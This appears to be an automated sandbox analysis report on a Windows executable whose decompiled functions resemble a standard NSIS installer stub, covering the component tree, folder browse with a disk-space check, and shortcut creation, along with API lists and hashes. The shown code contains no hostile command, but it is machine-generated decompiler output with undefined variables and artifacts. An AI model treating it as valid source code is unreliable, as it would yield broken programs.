                                        				if(_a8 != 0x110) {
                                        					L23:
                                        					if(_a8 != 0x405) {
                                        						_t289 = _a16;
                                        					} else {
                                        						_a12 = _t315;
                                        						_t289 = 1;
                                        						_a8 = 0x40f;
                                        						_a16 = 1;
                                        					}
                                        					if(_a8 == 0x4e || _a8 == 0x413) {
                                        						_v16 = _t289;
                                        						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
                                        							if(( *0x7a2f91 & 0x00000002) != 0) {
                                        								L41:
                                        								if(_v16 != _t315) {
                                        									_t232 = _v16;
                                        									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
                                        										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
                                        									}
                                        									_t233 = _v16;
                                        									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
                                        										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
                                        											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
                                        										} else {
                                        											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
                                        										}
                                        									}
                                        								}
                                        								goto L48;
                                        							}
                                        							if(_a8 == 0x413) {
                                        								L33:
                                        								_t289 = 0 | _a8 != 0x00000413;
                                        								_t240 = E00404627(_v8, _a8 != 0x413);
                                        								if(_t240 >= _t315) {
                                        									_t93 = _t280 + 8; // 0x8
                                        									_t310 = _t240 * 0x418 + _t93;
                                        									_t289 =  *_t310;
                                        									if((_t289 & 0x00000010) == 0) {
                                        										if((_t289 & 0x00000040) == 0) {
                                        											_t298 = _t289 ^ 0x00000001;
                                        										} else {
                                        											_t300 = _t289 ^ 0x00000080;
                                        											if(_t300 >= 0) {
                                        												_t298 = _t300 & 0xfffffffe;
                                        											} else {
                                        												_t298 = _t300 | 0x00000001;
                                        											}
                                        										}
                                        										 *_t310 = _t298;
                                        										E0040117D(_t240);
                                        										_t289 = 1;
                                        										_a8 = 0x40f;
                                        										_a12 = 1;
                                        										_a16 =  !( *0x7a2f90) >> 0x00000008 & 1;
                                        									}
                                        								}
                                        								goto L41;
                                        							}
                                        							_t289 = _a16;
                                        							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                        								goto L41;
                                        							}
                                        							goto L33;
                                        						} else {
                                        							goto L48;
                                        						}
                                        					} else {
                                        						L48:
                                        						if(_a8 != 0x111) {
                                        							L56:
                                        							if(_a8 == 0x200) {
                                        								SendMessageA(_v8, 0x200, _t315, _t315);
                                        							}
                                        							if(_a8 == 0x40b) {
                                        								_t220 =  *0x79f564;
                                        								if(_t220 != _t315) {
                                        									ImageList_Destroy(_t220);
                                        								}
                                        								_t221 =  *0x79f578;
                                        								if(_t221 != _t315) {
                                        									GlobalFree(_t221);
                                        								}
                                        								 *0x79f564 = _t315;
                                        								 *0x79f578 = _t315;
                                        								 *0x7a2fe0 = _t315;
                                        							}
                                        							if(_a8 != 0x40f) {
                                        								L86:
                                        								if(_a8 == 0x420 && ( *0x7a2f91 & 0x00000001) != 0) {
                                        									_t316 = (0 | _a16 == 0x00000020) << 3;
                                        									ShowWindow(_v8, _t316);
                                        									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
                                        								}
                                        								goto L89;
                                        							} else {
                                        								E004011EF(_t289, _t315, _t315);
                                        								if(_a12 != _t315) {
                                        									E00401410(8);
                                        								}
                                        								if(_a16 == _t315) {
                                        									L73:
                                        									E004011EF(_t289, _t315, _t315);
                                        									_v32 =  *0x79f578;
                                        									_t196 =  *0x7a2fa8;
                                        									_v60 = 0xf030;
                                        									_v16 = _t315;
                                        									if( *0x7a2fac <= _t315) {
                                        										L84:
                                        										InvalidateRect(_v8, _t315, 1);
                                        										if( *((intOrPtr*)( *0x7a275c + 0x10)) != _t315) {
                                        											E00404545(0x3ff, 0xfffffffb, E004045FA(5));
                                        										}
                                        										goto L86;
                                        									}
                                        									_t281 = _t196 + 8;
                                        									do {
                                        										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
                                        										if(_t202 != _t315) {
                                        											_t291 =  *_t281;
                                        											_v68 = _t202;
                                        											_v72 = 8;
                                        											if((_t291 & 0x00000001) != 0) {
                                        												_v72 = 9;
                                        												_v56 =  &(_t281[4]);
                                        												_t281[0] = _t281[0] & 0x000000fe;
                                        											}
                                        											if((_t291 & 0x00000040) == 0) {
                                        												_t206 = (_t291 & 0x00000001) + 1;
                                        												if((_t291 & 0x00000010) != 0) {
                                        													_t206 = _t206 + 3;
                                        												}
                                        											} else {
                                        												_t206 = 3;
                                        											}
                                        											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
                                        											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
                                        											SendMessageA(_v8, 0x110d, _t315,  &_v72);
                                        										}
                                        										_v16 = _v16 + 1;
                                        										_t281 =  &(_t281[0x106]);
                                        									} while (_v16 <  *0x7a2fac);
                                        									goto L84;
                                        								} else {
                                        									_t282 = E004012E2( *0x79f578);
                                        									E00401299(_t282);
                                        									_t217 = 0;
                                        									_t289 = 0;
                                        									if(_t282 <= _t315) {
                                        										L72:
                                        										SendMessageA(_v12, 0x14e, _t289, _t315);
                                        										_a16 = _t282;
                                        										_a8 = 0x420;
                                        										goto L73;
                                        									} else {
                                        										goto L69;
                                        									}
                                        									do {
                                        										L69:
                                        										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
                                        											_t289 = _t289 + 1;
                                        										}
                                        										_t217 = _t217 + 1;
                                        									} while (_t217 < _t282);
                                        									goto L72;
                                        								}
                                        							}
                                        						}
                                        						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                        							goto L89;
                                        						} else {
                                        							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
                                        							if(_t227 == 0xffffffff) {
                                        								goto L89;
                                        							}
                                        							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
                                        							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
                                        								_t283 = 0x20;
                                        							}
                                        							E00401299(_t283);
                                        							SendMessageA(_a4, 0x420, _t315, _t283);
                                        							_a12 = 1;
                                        							_a16 = _t315;
                                        							_a8 = 0x40f;
                                        							goto L56;
                                        						}
                                        					}
                                        				} else {
                                        					 *0x7a2fe0 = _a4;
                                        					_t285 = 2;
                                        					_v28 = 0;
                                        					_v16 = _t285;
                                        					 *0x79f578 = GlobalAlloc(0x40,  *0x7a2fac << 2);
                                        					_v24 = LoadBitmapA( *0x7a2f80, 0x6e);
                                        					 *0x79f574 = SetWindowLongA(_v8, 0xfffffffc, E00404CA1);
                                        					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                        					 *0x79f564 = _t252;
                                        					ImageList_AddMasked(_t252, _v24, 0xff00ff);
                                        					SendMessageA(_v8, 0x1109, _t285,  *0x79f564);
                                        					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                                        						SendMessageA(_v8, 0x111b, 0x10, 0);
                                        					}
                                        					DeleteObject(_v24);
                                        					_t286 = 0;
                                        					do {
                                        						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
                                        						if(_t258 != _t315) {
                                        							if(_t286 != 0x20) {
                                        								_v16 = _t315;
                                        							}
                                        							_push(_t258);
                                        							_push(_t315);
                                        							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E004059E1(_t286, _t315, _t320)), _t286);
                                        						}
                                        						_t286 = _t286 + 1;
                                        					} while (_t286 < 0x21);
                                        					_t317 = _a16;
                                        					_t287 = _v16;
                                        					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
                                        					_push(0x15);
                                        					E00403DA7(_a4);
                                        					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
                                        					_push(0x16);
                                        					E00403DA7(_a4);
                                        					_t318 = 0;
                                        					_t288 = 0;
                                        					if( *0x7a2fac <= 0) {
                                        						L19:
                                        						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                        						goto L20;
                                        					} else {
                                        						_t311 = _v32 + 8;
                                        						_v24 = _t311;
                                        						do {
                                        							_t268 = _t311 + 0x10;
                                        							if( *_t268 != 0) {
                                        								_v60 = _t268;
                                        								_t269 =  *_t311;
                                        								_t302 = 0x20;
                                        								_v84 = _t288;
                                        								_v80 = 0xffff0002;
                                        								_v76 = 0xd;
                                        								_v64 = _t302;
                                        								_v40 = _t318;
                                        								_v68 = _t269 & _t302;
                                        								if((_t269 & 0x00000002) == 0) {
                                        									if((_t269 & 0x00000004) == 0) {
                                        										 *( *0x79f578 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                        									} else {
                                        										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
                                        									}
                                        								} else {
                                        									_v76 = 0x4d;
                                        									_v44 = 1;
                                        									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                        									_v28 = 1;
                                        									 *( *0x79f578 + _t318 * 4) = _t274;
                                        									_t288 =  *( *0x79f578 + _t318 * 4);
                                        								}
                                        							}
                                        							_t318 = _t318 + 1;
                                        							_t311 = _v24 + 0x418;
                                        							_v24 = _t311;
                                        						} while (_t318 <  *0x7a2fac);
                                        						if(_v28 != 0) {
                                        							L20:
                                        							if(_v16 != 0) {
                                        								E00403DDC(_v8);
                                        								_t280 = _v32;
                                        								_t315 = 0;
                                        								goto L23;
                                        							} else {
                                        								ShowWindow(_v12, 5);
                                        								E00403DDC(_v12);
                                        								L89:
                                        								return E00403E0E(_a8, _a12, _a16);
                                        							}
                                        						}
                                        						goto L19;
                                        					}
                                        				}
                                        			}
                                        Per-line instruction addresses for the decompiled code above (flattened into a bare column by extraction, not reproduced): the call sites span 0x004046c5 to 0x00404c9e, with 0x00000000 where a line has no address.

                                        APIs
                                        • GetDlgItem.USER32 ref: 004046BE
                                        • GetDlgItem.USER32 ref: 004046CB
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404717
                                        • LoadBitmapA.USER32 ref: 0040472A
                                        • SetWindowLongA.USER32 ref: 0040473D
                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404751
                                        • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404765
                                        • SendMessageA.USER32(?,00001109,00000002), ref: 0040477A
                                        • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404786
                                        • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404798
                                        • DeleteObject.GDI32(?), ref: 0040479D
                                        • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004047C8
                                        • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004047D4
                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404869
                                        • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404894
                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 004048A8
                                        • GetWindowLongA.USER32 ref: 004048D7
                                        • SetWindowLongA.USER32 ref: 004048E5
                                        • ShowWindow.USER32(?,00000005), ref: 004048F6
                                        • SendMessageA.USER32(?,00000419,00000000,?), ref: 004049F9
                                        • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404A5E
                                        • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404A73
                                        • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404A97
                                        • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404ABD
                                        • ImageList_Destroy.COMCTL32(?), ref: 00404AD2
                                        • GlobalFree.KERNEL32 ref: 00404AE2
                                        • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404B52
                                        • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404BFB
                                        • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404C0A
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404C2A
                                        • ShowWindow.USER32(?,00000000), ref: 00404C78
                                        • GetDlgItem.USER32 ref: 00404C83
                                        • ShowWindow.USER32(00000000), ref: 00404C8A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
                                         • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
                                         • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                        • String ID: $M$N
                                        • API String ID: 1638840714-813528018
                                        • Opcode ID: f88003ccba9f0ad4292bbb639cf8dfb56ca7ece40271dea942f8be45a3b21ba3
                                        • Instruction ID: 9804f70a80ad740571f010f4d41a056d70bc73ca34169b501aedef0055c070ba
                                        • Opcode Fuzzy Hash: f88003ccba9f0ad4292bbb639cf8dfb56ca7ece40271dea942f8be45a3b21ba3
                                        • Instruction Fuzzy Hash: 3C029EB0D00208EFEB10DF64CD45AAE7BB5EB84315F10817AF610BA2E1C7799A52CF58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 68%
                                        			E004041E5(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                        				int _v8;
                                        				signed int _v12;
                                        				long _v16;
                                        				long _v20;
                                        				char _v24;
                                        				long _v28;
                                        				char _v32;
                                        				intOrPtr _v36;
                                        				long _v40;
                                        				signed int _v44;
                                        				CHAR* _v52;
                                        				intOrPtr _v56;
                                        				intOrPtr _v60;
                                        				intOrPtr _v64;
                                        				CHAR* _v68;
                                        				void _v72;
                                        				char _v76;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				intOrPtr _t75;
                                        				signed char* _t80;
                                        				intOrPtr* _t81;
                                        				int _t86;
                                        				int _t88;
                                        				int _t100;
                                        				signed int _t105;
                                        				char* _t110;
                                        				intOrPtr _t114;
                                        				intOrPtr* _t128;
                                        				signed int _t140;
                                        				signed int _t145;
                                        				CHAR* _t151;
                                        
                                        				_t75 =  *0x79ed58;
                                        				_v36 = _t75;
                                        				_t151 = ( *(_t75 + 0x3c) << 0xa) + 0x7a4000;
                                        				_v12 =  *((intOrPtr*)(_t75 + 0x38));
                                        				if(_a8 == 0x40b) {
                                        					E004052A3(0x3fb, _t151);
                                        					E00405BFB(_t151);
                                        				}
                                        				if(_a8 != 0x110) {
                                        					L8:
                                        					if(_a8 != 0x111) {
                                        						L19:
                                        						if(_a8 == 0x40f) {
                                        							L21:
                                        							_v8 = _v8 & 0x00000000;
                                        							_v12 = _v12 & 0x00000000;
                                        							_t145 = _t144 | 0xffffffff;
                                        							E004052A3(0x3fb, _t151);
                                        							if(E004055AC(_t169, _t151) == 0) {
                                        								_v8 = 1;
                                        							}
                                        							E004059BF(0x79e550, _t151);
                                        							_t80 = E0040555F(0x79e550);
                                        							if(_t80 != 0) {
                                        								 *_t80 =  *_t80 & 0x00000000;
                                        							}
                                        							_t81 = E00405CD2("KERNEL32.dll", "GetDiskFreeSpaceExA");
                                        							if(_t81 == 0) {
                                        								L28:
                                        								_t86 = GetDiskFreeSpaceA(0x79e550,  &_v20,  &_v28,  &_v16,  &_v40);
                                        								__eflags = _t86;
                                        								if(_t86 == 0) {
                                        									goto L31;
                                        								}
                                        								_t100 = _v20 * _v28;
                                        								__eflags = _t100;
                                        								_t145 = MulDiv(_t100, _v16, 0x400);
                                        								goto L30;
                                        							} else {
                                        								_push( &_v32);
                                        								_push( &_v24);
                                        								_push( &_v44);
                                        								_push(0x79e550);
                                        								if( *_t81() == 0) {
                                        									goto L28;
                                        								}
                                        								_t145 = (_v40 << 0x00000020 | _v44) >> 0xa;
                                        								L30:
                                        								_v12 = 1;
                                        								L31:
                                        								if(_t145 < E004045FA(5)) {
                                        									_v8 = 2;
                                        								}
                                        								if( *((intOrPtr*)( *0x7a275c + 0x10)) != 0) {
                                        									E00404545(0x3ff, 0xfffffffb, _t87);
                                        									if(_v12 == 0) {
                                        										SetDlgItemTextA(_a4, 0x400, 0x79e540);
                                        									} else {
                                        										E00404545(0x400, 0xfffffffc, _t145);
                                        									}
                                        								}
                                        								_t88 = _v8;
                                        								 *0x7a3024 = _t88;
                                        								if(_t88 == 0) {
                                        									_v8 = E00401410(7);
                                        								}
                                        								if(( *(_v36 + 0x14) & 0x00000400) != 0) {
                                        									_v8 = 0;
                                        								}
                                        								E00403DC9(0 | _v8 == 0x00000000);
                                        								if(_v8 == 0 &&  *0x79f570 == 0) {
                                        									E0040417A();
                                        								}
                                        								 *0x79f570 = 0;
                                        								goto L45;
                                        							}
                                        						}
                                        						_t169 = _a8 - 0x405;
                                        						if(_a8 != 0x405) {
                                        							goto L45;
                                        						}
                                        						goto L21;
                                        					}
                                        					_t105 = _a12 & 0x0000ffff;
                                        					if(_t105 != 0x3fb) {
                                        						L12:
                                        						if(_t105 == 0x3e9) {
                                        							_t140 = 7;
                                        							memset( &_v72, 0, _t140 << 2);
                                        							_t144 = 0x79f580;
                                        							_v76 = _a4;
                                        							_v68 = 0x79f580;
                                        							_v56 = E004044DF;
                                        							_v52 = _t151;
                                        							_v64 = E004059E1(0x3fb, 0x79f580, _t151);
                                        							_t110 =  &_v76;
                                        							_v60 = 0x41;
                                        							__imp__SHBrowseForFolderA(_t110, 0x79e958, _v12);
                                        							if(_t110 == 0) {
                                        								_a8 = 0x40f;
                                        							} else {
                                        								E0040521C(0, _t110);
                                        								E004054CC(_t151);
                                        								_t114 =  *((intOrPtr*)( *0x7a2f88 + 0x11c));
                                        								if(_t114 != 0) {
                                        									_push(_t114);
                                        									_push(0);
                                        									E004059E1(0x3fb, 0x79f580, _t151);
                                        									_t144 = 0x7a1f20;
                                        									if(lstrcmpiA(0x7a1f20, 0x79f580) != 0) {
                                        										lstrcatA(_t151, 0x7a1f20);
                                        									}
                                        								}
                                        								 *0x79f570 =  *0x79f570 + 1;
                                        								SetDlgItemTextA(_a4, 0x3fb, _t151);
                                        							}
                                        						}
                                        						goto L19;
                                        					}
                                        					if(_a12 >> 0x10 != 0x300) {
                                        						goto L45;
                                        					}
                                        					_a8 = 0x40f;
                                        					goto L12;
                                        				} else {
                                        					_t144 = GetDlgItem(_a4, 0x3fb);
                                        					if(E00405538(_t151) != 0 && E0040555F(_t151) == 0) {
                                        						E004054CC(_t151);
                                        					}
                                        					 *0x7a2758 = _a4;
                                        					SetWindowTextA(_t144, _t151);
                                        					_push( *((intOrPtr*)(_a16 + 0x34)));
                                        					_push(1);
                                        					E00403DA7(_a4);
                                        					_push( *((intOrPtr*)(_a16 + 0x30)));
                                        					_push(0x14);
                                        					E00403DA7(_a4);
                                        					E00403DDC(_t144);
                                        					_t128 = E00405CD2("shlwapi.dll", "SHAutoComplete");
                                        					if(_t128 == 0) {
                                        						L45:
                                        						return E00403E0E(_a8, _a12, _a16);
                                        					}
                                        					 *_t128(_t144, 1);
                                        					goto L8;
                                        				}
                                        			}
                                        0x004041eb
                                        0x004041f2
                                        0x004041fe
                                        0x0040420c
                                        0x00404214
                                        0x00404218
                                        0x0040421e
                                        0x0040421e
                                        0x0040422a
                                        0x004042a4
                                        0x004042ab
                                        0x00404377
                                        0x0040437e
                                        0x0040438d
                                        0x0040438d
                                        0x00404391
                                        0x00404397
                                        0x0040439a
                                        0x004043a7
                                        0x004043a9
                                        0x004043a9
                                        0x004043b7
                                        0x004043bd
                                        0x004043c4
                                        0x004043c6
                                        0x004043c6
                                        0x004043d3
                                        0x004043df
                                        0x00404403
                                        0x00404414
                                        0x0040441a
                                        0x0040441c
                                        0x00000000
                                        0x00000000
                                        0x00404422
                                        0x00404422
                                        0x00404430
                                        0x00000000
                                        0x004043e1
                                        0x004043e4
                                        0x004043e8
                                        0x004043ec
                                        0x004043ed
                                        0x004043f2
                                        0x00000000
                                        0x00000000
                                        0x004043fa
                                        0x00404432
                                        0x00404432
                                        0x00404439
                                        0x00404442
                                        0x00404444
                                        0x00404444
                                        0x00404456
                                        0x00404460
                                        0x00404468
                                        0x0040447e
                                        0x0040446a
                                        0x0040446e
                                        0x0040446e
                                        0x00404468
                                        0x00404483
                                        0x00404488
                                        0x0040448d
                                        0x00404496
                                        0x00404496
                                        0x0040449f
                                        0x004044a1
                                        0x004044a1
                                        0x004044ad
                                        0x004044b5
                                        0x004044bf
                                        0x004044bf
                                        0x004044c4
                                        0x00000000
                                        0x004044c4
                                        0x004043df
                                        0x00404380
                                        0x00404387
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00404387
                                        0x004042b1
                                        0x004042b7
                                        0x004042d1
                                        0x004042d6
                                        0x004042e0
                                        0x004042e7
                                        0x004042ec
                                        0x004042f6
                                        0x004042f9
                                        0x004042fc
                                        0x00404303
                                        0x0040430b
                                        0x0040430e
                                        0x00404312
                                        0x00404319
                                        0x00404321
                                        0x00404370
                                        0x00404323
                                        0x00404324
                                        0x0040432a
                                        0x00404334
                                        0x0040433c
                                        0x0040433e
                                        0x0040433f
                                        0x00404341
                                        0x00404347
                                        0x00404355
                                        0x00404359
                                        0x00404359
                                        0x00404355
                                        0x0040435e
                                        0x00404369
                                        0x00404369
                                        0x00404321
                                        0x00000000
                                        0x004042d6
                                        0x004042c4
                                        0x00000000
                                        0x00000000
                                        0x004042ca
                                        0x00000000
                                        0x0040422c
                                        0x00404237
                                        0x00404240
                                        0x0040424d
                                        0x0040424d
                                        0x00404257
                                        0x0040425c
                                        0x00404265
                                        0x00404268
                                        0x0040426d
                                        0x00404275
                                        0x00404278
                                        0x0040427d
                                        0x00404283
                                        0x00404292
                                        0x00404299
                                        0x004044ca
                                        0x004044dc
                                        0x004044dc
                                        0x004042a2
                                        0x00000000
                                        0x004042a2

                                        APIs
                                        • GetDlgItem.USER32 ref: 00404230
                                        • SetWindowTextA.USER32(00000000,?), ref: 0040425C
                                        • SHBrowseForFolderA.SHELL32(?,0079E958,?), ref: 00404319
                                        • lstrcmpiA.KERNEL32(007A1F20,0079F580,00000000,?,?,00000000), ref: 0040434D
                                        • lstrcatA.KERNEL32(?,007A1F20), ref: 00404359
                                        • SetDlgItemTextA.USER32 ref: 00404369
                                          • Part of subcall function 004052A3: GetDlgItemTextA.USER32 ref: 004052B6
                                          • Part of subcall function 00405BFB: CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
                                          • Part of subcall function 00405BFB: CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
                                          • Part of subcall function 00405BFB: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
                                          • Part of subcall function 00405BFB: CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
                                        • GetDiskFreeSpaceA.KERNEL32(0079E550,?,?,0000040F,?,KERNEL32.dll,GetDiskFreeSpaceExA,0079E550,0079E550,?,?,000003FB,?), ref: 00404414
                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040442A
                                        • SetDlgItemTextA.USER32 ref: 0040447E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
                                         • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
                                         • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: CharItemText$Next$BrowseDiskFolderFreePrevSpaceWindowlstrcatlstrcmpi
                                        • String ID: A$GetDiskFreeSpaceExA$KERNEL32.dll$Py$SHAutoComplete$shlwapi.dll
                                        • API String ID: 2007447535-1909522251
                                        • Opcode ID: fa85b854a19c834815a7f5dd914cc43de4103a60353febe687952c11a8408a20
                                        • Instruction ID: ef859d302125b71f7b9a0a5e3096057e4f4c42b01edd6451a005236750c2ec27
                                        • Opcode Fuzzy Hash: fa85b854a19c834815a7f5dd914cc43de4103a60353febe687952c11a8408a20
                                        • Instruction Fuzzy Hash: 0D819BB1900218BBDB11AFA1DC45BAF7BB8EF84314F00417AFA04B62D1D77C9A418B69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 74%
                                        			E004020A6(void* __eflags) {
                                        				void* _t44;
                                        				intOrPtr* _t48;
                                        				intOrPtr* _t50;
                                        				intOrPtr* _t52;
                                        				intOrPtr* _t54;
                                        				signed int _t58;
                                        				intOrPtr* _t59;
                                        				intOrPtr* _t62;
                                        				intOrPtr* _t64;
                                        				intOrPtr* _t66;
                                        				intOrPtr* _t69;
                                        				intOrPtr* _t71;
                                        				int _t75;
                                        				signed int _t81;
                                        				intOrPtr* _t88;
                                        				void* _t95;
                                        				void* _t96;
                                        				void* _t100;
                                        
                                        				 *(_t100 - 0x30) = E00402A9A(0xfffffff0);
                                        				_t96 = E00402A9A(0xffffffdf);
                                        				 *((intOrPtr*)(_t100 - 0x2c)) = E00402A9A(2);
                                        				 *((intOrPtr*)(_t100 - 0x34)) = E00402A9A(0xffffffcd);
                                        				 *((intOrPtr*)(_t100 - 0x44)) = E00402A9A(0x45);
                                        				if(E00405538(_t96) == 0) {
                                        					E00402A9A(0x21);
                                        				}
                                        				_t44 = _t100 + 8;
                                        				__imp__CoCreateInstance(0x407324, _t75, 1, 0x407314, _t44);
                                        				if(_t44 < _t75) {
                                        					L12:
                                        					 *((intOrPtr*)(_t100 - 4)) = 1;
                                        					_push(0xfffffff0);
                                        				} else {
                                        					_t48 =  *((intOrPtr*)(_t100 + 8));
                                        					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407334, _t100 - 8);
                                        					if(_t95 >= _t75) {
                                        						_t52 =  *((intOrPtr*)(_t100 + 8));
                                        						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
                                        						_t54 =  *((intOrPtr*)(_t100 + 8));
                                        						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\jones\\AppData\\Local\\Temp");
                                        						_t81 =  *(_t100 - 0x14);
                                        						_t58 = _t81 >> 0x00000008 & 0x000000ff;
                                        						if(_t58 != 0) {
                                        							_t88 =  *((intOrPtr*)(_t100 + 8));
                                        							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
                                        							_t81 =  *(_t100 - 0x14);
                                        						}
                                        						_t59 =  *((intOrPtr*)(_t100 + 8));
                                        						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
                                        						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0x34)))) != _t75) {
                                        							_t71 =  *((intOrPtr*)(_t100 + 8));
                                        							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0x34)),  *(_t100 - 0x14) & 0x000000ff);
                                        						}
                                        						_t62 =  *((intOrPtr*)(_t100 + 8));
                                        						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
                                        						_t64 =  *((intOrPtr*)(_t100 + 8));
                                        						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
                                        						if(_t95 >= _t75) {
                                        							 *0x409418 = _t75;
                                        							MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409418, 0x400);
                                        							_t69 =  *((intOrPtr*)(_t100 - 8));
                                        							_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409418, 1);
                                        						}
                                        						_t66 =  *((intOrPtr*)(_t100 - 8));
                                        						 *((intOrPtr*)( *_t66 + 8))(_t66);
                                        					}
